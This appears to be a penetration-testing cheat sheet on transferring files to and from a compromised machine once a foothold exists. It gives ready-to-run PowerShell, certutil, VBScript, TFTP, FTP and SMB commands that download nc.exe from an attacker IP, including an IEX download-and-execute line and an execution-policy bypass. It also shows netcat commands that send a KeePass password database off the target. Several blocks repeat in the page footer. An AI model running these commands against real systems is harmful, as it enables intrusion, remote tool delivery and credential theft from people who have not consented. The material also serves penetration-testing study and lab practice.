Transferring Files

How to transfer files

There are various ways to transfer files once an initial foot has been made.

HTTP

The simplest way to transfer files from one box to another is by using Python SimpleHTTPServer module as can be seen below:

python -m SimpleHTTPServer <port number>

Powershell

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.10.20/nc.exe','c:\temp\nc.exe')

powershell.exe -c (Start-BitsTransfer -Source "http://10.10.10.20/nc.exe -Destination C:\temp\nc.exe")

powershell wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.10.20/nc.exe')"

echo $storageDir = $pwd > wget1.ps1
echo $webclient = New-Object System.Net.WebClient >> wget1.ps1
echo $url = "http://10.10.10.20/nc.exe" >> wget1.ps1
echo $file = "new-nc.exe" >> wget1.ps1
echo $webclient.DownloadFile($url,$file) >> wget1.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget1.ps1

Certutil

certutil.exe -urlcache -split -f "http://10.10.10.20/nc.exe" c:\temp\nc.exe

VBScript

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

TFTP

On Linux:
mkdir /tftp
atftpd --daemon --port 69 ~/tftp

On Windows:
tftp -i 10.10.10.20 GET nc.exe

FTP

Install it first and start service

apt-get install pure-ftpd
service pure-ftpd start

Set up the attacking machine

On the target machine run:

echo open 10.10.10.32 21> ftp1.txt        <--- Attacking IP
echo username>> ftp1.txt                  <--- Your username
echo password>> ftp1.txt                  <--- Your password
echo binary>> ftp1.txt		
echo GET executable.exe>> ftp1.txt
echo bye>> ftp1.txt
ftp -s:ftp1.txt

SMB

On Kali-Linux:
python /usr/share/doc/python-impacket/examples/smbserver.py dir-name .
python3 /usr/share/doc/python3-impacket/examples/smbserver.py dir-name .

On Windows:
copy \\KALI_IP\dir-name\name_of_the_file_you_want_to_transfer .

Base64 transfer binaries

# On target
base64 -w0 /path/to/binary    <-- copy the content and save into a .b64 file.

# On my kali
base64 -d filename.bs64 > mybinary
chmod +x mybinary

Windows to Linux

### On a Windows Target ###

nc.exe -v -w 30 -p 4444 -l < some_password.kdbx
listening on [any] 4444 ...


### ON MY KALI ###

nc -v -w 2 TARGET_IP 4444 > password.kdbx
TARGET_IP [TARGET_IP ] 4444 (?) open

PreviousPostgresl NextMetasploit Framework

Last updated 3 years ago

Was this helpful?

echo $storageDir = $pwd > wget1.ps1 echo $webclient = New-Object System.Net.WebClient >> wget1.ps1 echo $url = "http://10.10.10.20/nc.exe" >> wget1.ps1 echo $file = "new-nc.exe" >> wget1.ps1 echo $webclient.DownloadFile($url,$file) >> wget1.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget1.ps1

echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET", strURL, False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs

echo open 10.10.10.32 21> ftp1.txt <--- Attacking IP echo username>> ftp1.txt <--- Your username echo password>> ftp1.txt <--- Your password echo binary>> ftp1.txt echo GET executable.exe>> ftp1.txt echo bye>> ftp1.txt ftp -s:ftp1.txt

On Kali-Linux: python /usr/share/doc/python-impacket/examples/smbserver.py dir-name . python3 /usr/share/doc/python3-impacket/examples/smbserver.py dir-name . On Windows: copy \\KALI_IP\dir-name\name_of_the_file_you_want_to_transfer .

### On a Windows Target ### nc.exe -v -w 30 -p 4444 -l < some_password.kdbx listening on [any] 4444 ... ### ON MY KALI ### nc -v -w 2 TARGET_IP 4444 > password.kdbx TARGET_IP [TARGET_IP ] 4444 (?) open